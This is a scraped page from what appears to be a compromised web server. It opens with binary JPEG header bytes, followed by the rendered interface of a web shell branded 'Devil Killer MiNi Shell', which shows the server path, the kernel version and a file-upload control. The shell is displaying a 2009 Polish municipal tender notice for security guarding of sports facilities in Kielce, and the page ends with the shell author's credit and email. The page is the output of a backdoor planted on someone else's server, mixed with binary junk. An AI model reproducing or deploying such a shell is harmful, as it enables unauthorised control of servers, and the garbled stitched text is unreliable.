JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091019/181703-N-2009.html

<p class="kh_header"><b>Kielce: Usługa ochrony fizycznej obiektów sportowo - rekreacyjnych Miejskiego Ośrodka Sportu i Rekreacji                            w Kielcach w roku 2010.</b><br>
<b>Numer ogłoszenia: 181703 - 2009; data zamieszczenia: 19.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Żytnia 1, 25-018 Kielce, woj. świętokrzyskie, tel. 041 3449239, faks 041 3440375.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna jst zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa ochrony fizycznej obiektów sportowo - rekreacyjnych Miejskiego Ośrodka Sportu i Rekreacji                            w Kielcach w roku 2010..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi bezpośredniej  ochrony fizycznej osób, mienia  i obiektów sportowo-rekreacyjnych należących do Zamawiającego znajdujących sie na terenie miasta Kielce ,  zapewnienie pracownikom ochrony wsparcia grupy interwencyjnej szybkiego reagowania oraz  dozorowanie urządzeń  alarmowych zainstalowanych w obiektach Zamawiającego  w okresie od: 1 stycznia 2010r do  1 stycznia 2011r.
Wykaz lokalizacji i sposób sprawowania ochrony:

1) Zespół Obiektów Sportowych przy ul. Ściegiennego 8;  (hotel STADION , hala sportowa, stadion piłkarski) we wszystkie dni tygodnia, przez dwóch pracowników ochrony jednocześnie  w godzinach pomiędzy     7.00 a 7.00 dnia następnego.

2) Zespół Obiektów Sportowych przy ul. Bocznej 15; (hala LEGIONÓW , hotel MARATON , stadion l.a.) 
a) hotel Maraton i stadion  l.a.:
- we wszystkie dni tygodnia, przez jednego  pracownika ochrony w godzinach pomiędzy 7.00 a 7.00 dnia następnego.
b) Hala Legionów:
- we wszystkie dni tygodnia, przez jednego  pracownika ochrony w godzinach pomiędzy 7.00 a 7.00 dnia następnego.

3)  Zespół Obiektów Sportowych przy ul. Szczecińskiej 1; (basen letni / lodowisko) 
a)	we wszystkie dni tygodnia, przez jednego pracownika ochrony w godzinach pomiędzy 19.00 a 7.00 dnia następnego,
b)	w niedziele i święta przez jednego pracownika ochrony w okresie od  7  marca  do 13  czerwca 2009 oraz od  12  września do 26 grudnia 2009 r - w godzinach pomiędzy 7.00 a 19.00( łącznie do 32 dni),
c)	przez jednego pracownika ochrony w okresie od 19 czerwca do 5 września 2009 r. w godzinach pomiędzy 10.00 a 19.00( łącznie do 60 dni).

4)  Hala Sportowa przy ul. Krakowskiej 72( hala , hotel ) 
-  we wszystkie dni tygodnia, przez jednego pracownika ochrony w godzinach pomiędzy 19.00 a 7.00 dnia następnego.

5) Kryta Pływalnia DELFIN przy ul. Krakowskiej 2
- we wszystkie dni tygodnia, przez jednego pracownika ochrony w godzinach pomiędzy 18.00 , a 6.00 dnia  następnego;

6) Kryta Pływalnia ORKA przy ul. Kujawskiej 18
- we wszystkie dni tygodnia, przez jednego pracownika ochrony w godzinach pomiędzy 22.00 , a 6.00 dnia następnego.

7) Kryta Pływalnia MORS przy ul. Toporowskiego 96 
- we wszystkie dni tygodnia, przez jednego pracownika ochrony w godzinach pomiędzy  22.00,  a   6.00 dnia następnego.

8) Kryta Pływalnia przy szkole na Ślichowicach ul. Jurajska  7
- we wszystkie dni tygodnia, przez jednego pracownika ochrony w godzinach pomiędzy 22.00 a 6.00 dnia następnego.

9) Stadion piłkarski przy ul. Szczepaniaka - we wszystkie dni tygodnia, przez jednego pracownika ochrony w godzinach pomiędzy 19.00  a  7.00 dnia następnego.

Łącznie - przewidywana liczba godzin ochrony w okresie realizacji zamówienia wyniesie:  62 244 godziny.

Ochrona fizyczna będzie realizowana  przez pracowników ochrony spełniających wszystkie wymagania określone w ustawie o ochronie osób                     i mienia ( Dz. U. z 2005r Nr 145, poz. 1221 ze zm.)

Przed przystąpieniem do sporządzenia  wniosku i oferty należy dokonać wizji lokalnej poszczególnych nieruchomości w oznaczonych lokalizacjach.
Szczegółowy zakres czynności objętych usługą ochrony obejmuje:
-  stałe patrolowanie budynków wewnątrz jak na zewnątrz poprzez wykonywanie okresowych prewencyjnych obchodów  obiektów z zaznaczeniem  czynności, trasy obchodu na czytnikach zainstalowanych przez Wykonawcę na terenie obiektu ,
- obserwacje monitorów wizyjnych przesyłających obraz z kamer rozmieszczonych na terenie obiektów i  w ich otoczeniu zewnętrznym, 
- działania mające na celu zapewnienie bezpieczeństwa życia, zdrowia i nietykalności osobistej pracowników Zamawiającego i innych osób znajdujących się na terenie obiektu;
- działania zapobiegające przestępstwom i przekroczeniom przeciwko mieniu , w szczególności: kradzieżom, włamaniom i innym formom wyprowadzenia mienia poza strefę kontrolowaną, przeciwdziałanie powstaniu szkody wynikającej z tych zdarzeń;
- dozorowanie zainstalowanych w siedzibie zamawiającego  systemów: monitoringu, systemu sygnalizacji wykrywania pożaru;
-  reagowanie na sygnał alarmu antywłamaniowego, 
- ochrona parkingów wraz ze znajdującymi się na nim pojazdami , w razie potrzeby obsługa wjazdu i wyjazdu samochodów z parkingu;
- ochrona obiektu przed wszelkimi działaniami niepożądanymi ze strony osób trzecich, a w szczególności: zapobieganie zakłóceniom porządku, zbiegowiskom i zachowaniom osób zakłócających pracę, interweniowanie w przypadku zakłócania przez te osoby porządku; 
 - kontrola pod względem możliwości wyrządzenia szkód typu: malowanie sprayem, sabotażu, aktów samowoli i wandalizmu;
- sprawdzanie zabezpieczenia pomieszczeń w których zakończono pracę,
- zwracania uwagi na wnoszone lub pozostawione bez opieki podejrzanie wyglądające  bagaże lub pakunki,
- podejmowanie natychmiastowych działań  interwencyjnych w przypadku zadziałania sygnalizacji alarmu przeciwpożarowego, zgodnie z obowiązująca instrukcją przeciwpożarową,
- nie wpuszczanie do budynków osób będących  pod wpływem alkoholu lub środków odurzających
- zwracania uwagi na osoby palące w miejscach niedozwolonych
- kontrolowania zamknięcia wszystkich drzwi ewakuacyjnych
- ujawnianie zauważonych awarii i zdarzeń mających wpływ na funkcjonowanie obiektów, w razie potrzeby informowania o nich wyznaczonych pracowników zamawiającego lub odpowiednie służby  oraz  swoich przełożonych, a także wpisywanie tych zdarzeń i podjętych działań książce raportów/ dyżurów;
- po zakończeniu pracy Zamawiającego-sprawdzenie wszystkich korytarzy, wyjść i wejść oraz pomieszczeń mając na uwadze prawidłowe zabezpieczenie obiektu oraz przepisy ppoż, ustalenie, czy na terenie chronionego obiektu nie pozostały osoby nie uprawnione; 

Na obiektach / pływalniach / przy ul. Toporowskiego 96, Krakowskiej 2, Kujawskiej 18, Jurajskiej 7 i stadionie przy ul. Szczepaniaka -  należy uwzględnić dostawę i instalację pilotów antynapadowych / po 1 szt / na koszt Wykonawcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 79.71.50.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy: 

1/ spełniają warunki określone w art.22 ust. 1 ustawy pzp;
2/  posiadają koncesję na prowadzenie  działalności wydaną na podstawie ustawy z dnia 22.08.1997 r. o ochronie osób i mienia / Dz. U. z 2005 r. Nr 145 poz. 1221 /; 
3/ wykonali ,a przypadku świadczeń okresowych lub ciągłych - wykonują w ciągu ostatnich trzech lat przed wszczęciem postępowania  o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej dwie usługi ochrony osób i mienia, z których każda polega na  bezpośredniej ochronie fizycznej w budynkach / obiektach - o wartości usługi nie mniejszej niż 400 000 zł brutto  każda;
4/dysponują co najmniej 15 osobami  z co najmniej 6 -miesięcznym stażem pracy  na stanowisku pracownika ochrony , oraz 15  osobami  posiadającymi  licencję  pracownika ochrony fizycznej pierwszego stopnia; /
5/dysponują grupami interwencyjnymi na terenie miasta Kielc z wykorzystaniem  firmowo oznakowanych  samochodów;
6/Posiadają ważne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności,  związanej z przedmiotem zamówienia / usług ochrony mienia /. 
Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 5, to Zamawiający zaprosi do składania ofert tylko tych 5 Wykonawców, którzy spełnili warunki określone    w punkcie III.2).Wykonawcę nie zaproszonego do składania ofert traktuje się jak wykluczonego z postępowania o udzielenie zamówienia. 

Jeśli liczba Wykonawców, którzy spełniają warunku udziału w postępowaniu będzie większa niż 5, to Zamawiający oceni Wykonawców na podstawie dostarczonych przez nich dokumentów w następujący sposób: 


Kryterium  1. Wykazanie 2-ch zamówień usługi ochrony mienia  o wartości nie mniejszej niż 400 000 zł brutto każda = 10 pkt.
Za każde dodatkowe odpowiadające warunkowi zamówienie -  przyznane zostanie 10 pkt  - maksymalnie 50 pkt. 
Kryterium 2. Oświadczenie, o zatrudnieniu  15 pracowników ochrony z co najmniej 6 -miesięcznym stażem pracy =  10 pkt. 
Za każdego 1 pracownika więcej  ponad 15-tu  z co najmniej  6 - miesięcznym stażem pracy Wykonawca otrzyma 10 pkt  -  maksymalnie 50 pkt. 
Kryterium 3. Wykaz - iż Wykonawca zatrudnia co najmniej 15 osób posiadających  licencję  pracownika ochrony fizycznej pierwszego stopnia = 10 pkt.
Za każda osobę więcej - Wykonawca otrzyma 10 pkt  -  maksymalnie 50 pkt.
Kryterium 4. Oświadczenie o dysponowaniu 1 grupą interwencyjną na terenie miasta Kielc z oznakowanym firmowo samochodem = 10 pkt.
Za każdą grupę więcej  - Wykonawca otrzyma 10 pkt   - maksymalnie  50 pkt.

Punkty za warunki pośrednie nie będą przyznawane. 

Wynik stanowi suma punktów, jakie otrzyma każdy wniosek. 
Punkty przyzna komisja przetargowa w toku badania wniosków. Wnioski, które przedstawią najkorzystniejszy bilans  (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) zostaną uznane za najkorzystniejsze i Wykonawcy którzy je złożyli, w liczbie maksymalnej 5 zostaną zaproszeni do składania ofert. 

W przypadku uzyskania jednakowej ilości punktów, o ocenie ostatecznej będzie decydować : liczba grup interwencyjnych na terenie miasta Kielc.
Gdyby zaś i ilość  grup interwencyjnych w Kielcach była taka sama, to decydować będzie liczba pracowników z co najmniej 6-miesiecznym stażem pracy.

Jeżeli liczba Wykonawców spełniających warunki określone w punkcie III.2). będzie mniejsza niż 5, to Zamawiający zaprosi do składania ofert wszystkich Wykonawców.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania powyższych warunków, Wykonawca winien dostarczyć: 
1/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia  / w oryginale lub kopii potwierdzonej przez Wykonawcę/ 
2/ oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art.22 ust.1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych  wg zał. nr 1 / w oryginale/       
3/ dokument potwierdzający  prowadzenie działalności zgodnej z ustawą z dnia 22.08.1997 r. o ochronie osób i mienia / Dz. U. z 2005 r. Nr 145 poz. 1221 / w kserokopii potwierdzonej za zgodność z oryginałem - przez Wykonawcę/
4/ wykaz  wykonanych usług, a przypadku świadczeń okresowych lub ciągłych -również wykonywanych  usług  w okresie ostatnich trzech   lat przed wszczęciem postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, co najmniej dwóch  usługi ochrony mienia, z których każda polega na  bezpośredniej ochronie fizycznej w budynkach / obiektach -  o wartości usługi nie mniejszej niż 400 000 zł brutto  każda, z podaniem ich wartości , przedmiotu, dat wykonania i odbiorców wg wzoru jak w zał. nr 2 -  w oryginale, potwierdzone załączonymi do wykazu dokumentami               o należytym wykonaniu zamówienia , / w oryginale lub kopii potwierdzonej przez Wykonawcę /  
5/ aktualną informację z Krajowego Rejestru Karnego w zakresie:
-  określonym w art. 24 ust. 1 pkt 4-8 ustawy pzp, wystawionej nie wcześniej, niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu
- określonym w art. 24 ust. 1 pkt 9 ustawy pzp, wystawionej nie wcześniej, niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu   / w oryginale lub kopii potwierdzonej przez Wykonawcę za zgodność z oryginałem/ 
6/ oświadczenie o ilości zatrudnionych  pracowników ochrony z 6-miesięcznym stażem pracy  / w oryginale / 
7/ oświadczenie o ilości  pracowników posiadających  licencję I stopnia / w oryginale 
8/ oświadczenie o ilości grup interwencyjnych na terenie Kielc z wykorzystaniem oznakowanych firmowo samochodów /w oryginale /
9/ dokumenty potwierdzające uprawnienie osób ( pełnomocnictwo) podpisujących wniosek, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych, / w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza /
10/ dokument potwierdzający ważne ubezpieczenie odpowiedzialności cywilnej                     w zakresie prowadzonej działalności związanej z przedmiotem zamówienia / usług ochrony mienia /  -  w kserokopii potwierdzonej przez Wykonawcę .
 
Udział w postępowaniu podmiotów występujących wspólnie.

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W przypadku składania Wniosku o dopuszczenie do udziału w postępowaniu przez podmioty występujące wspólnie: Wykonawcy ustanowią Lidera oraz pełnomocnika  do reprezentowania ich  w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i  zawarcia umowy w sprawie udzielenia zamówienia publicznego.
Zgodnie z art. 141 PZP wykonawcy składający ofertę wspólną ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczania należytego wykonania umowy. Zasady odpowiedzialności solidarnej dłużników określa art. 366 Kodeksu Cywilnego.
Uwaga:
Żaden z Wykonawców występujący wspólnie nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2  pzp, a także osobno muszą spełniać wymogi, o których mowa w art. 22 ust.1 pzp. 
Dla potwierdzenia spełnienia warunków, o których mowa w sekcji III.2), Wykonawcy winni złożyć: 
 - oddzielnie oświadczenia i dokumenty wskazane w sekcji III.2) Informacji o oświadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy w celu  potwierdzenia spełnienia warunków udziału w postępowaniu,  ppkt :1,2,3,5,10,
- łącznie  oświadczenia dokumenty wskazane w sekcji III.2) Informacji o oświadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy w celu  potwierdzenia spełnienia warunków udziału w postępowaniu,  ppkt: 4,6,7,8,9..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> S I W Z zostanie przekazana Wykonawcom zaproszonym do złożenia oferty..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2009 godzina 10:00, miejsce: Miejski Ośrodek Sportu i Rekreacji , 25-018 Kielce ul. Żytnia 1,( I p.   sekretariat);.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com